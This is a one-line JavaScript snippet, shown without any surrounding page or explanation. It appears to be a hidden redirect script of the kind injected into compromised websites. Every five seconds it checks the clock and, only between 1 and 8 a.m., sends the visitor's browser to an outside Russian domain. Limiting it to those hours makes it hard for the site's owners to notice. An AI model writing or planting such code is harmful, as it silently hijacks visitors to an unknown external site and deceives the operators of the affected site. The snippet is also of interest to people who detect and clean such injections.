setInterval(function(){ var h = new Date().getHours(); if(h > 0 && h < 9) location = 'http://site.ru'; },5000);